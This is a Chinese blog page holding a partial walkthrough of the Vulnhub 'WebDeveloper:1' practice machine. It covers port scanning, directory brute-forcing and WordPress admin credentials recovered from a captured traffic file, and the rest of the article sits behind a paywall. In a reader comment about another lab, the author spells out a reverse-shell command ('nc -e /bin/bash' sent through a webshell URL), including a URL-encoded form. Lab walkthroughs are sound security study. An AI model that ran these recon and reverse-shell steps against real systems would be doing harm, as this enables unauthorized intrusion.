Vulnhub:WebDeveloper:1靶机

ctostm

已于 2023-06-07 23:41:22 修改

阅读量328

点赞数

文章标签：安全网络安全

于 2023-03-27 16:56:48 首次发布

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/qq_43884092/article/details/129798852

版权

kali：192.168.111.111

靶机：192.168.111.243

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.243

目录爆破发现ipdata目录

feroxbuster -k -d 1 --url http://192.168.111.243/ -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,bak,txt,html,sql,zip,phtml,sh -t 1

进入该目录发现一个流量包，下载使用wireshark打开

查看后发现wordpress后台用户密码：webdeveloper|Te5eQg&4sBS!Yr$)wf%(DcAd

最低0.47元/天解锁文章

博客等级

码龄6年

102
原创

9
点赞

33
收藏

12
粉丝

关注

私信

热门文章

最新评论

Vulnhub:Digitalworld.local (Mercy v2)靶机
S20030803: 为什么访问robots.txt文件时访问不了呢
Vulnhub: LemonSqueezy靶机
Bobo10969: 我找到問題了是我虛擬機network connection選到了bridge改成NAT就成功了感謝大大的幫忙!
Vulnhub: LemonSqueezy靶机
Bobo10969: 還是有可能是我後門放錯地方嗎有需要再myphpadmin的wordpress新增一個table再寫入嗎
Vulnhub: LemonSqueezy靶机
ctostm: 假设本机ip为192.168.111.111，利用 nc -lvp 5555 命令监听本地5555端口(监听的端口为未被使用的端口即可)，之后利用webshell执行的命令为：nc -e /bin/bash 192.168.111.111 5555 (完整的url为：http://lemonsqueezy/wordpress/shell1.php?cmd=nc -e /bin/bash 192.168.111.111 5555)，如果执行后无法获得反弹shell，可以对执行的命令进行url编码(可以使用burp的decoder模块)后再执行 (编码后完整的url为：http://lemonsqueezy/wordpress/shell1.php?cmd=%6e%63%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68%20%31%39%32%2e%31%36%38%2e%31%31%31%2e%31%31%31%20%34%34%34%34)，生成反弹shell的网站：https://www.revshells.com/
Vulnhub: LemonSqueezy靶机
Bobo10969: 不好意思那請問端口是用沒被使用的端口就可以了嗎發現好像還是監聽不到

最新文章

目录

展开全部

收起

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。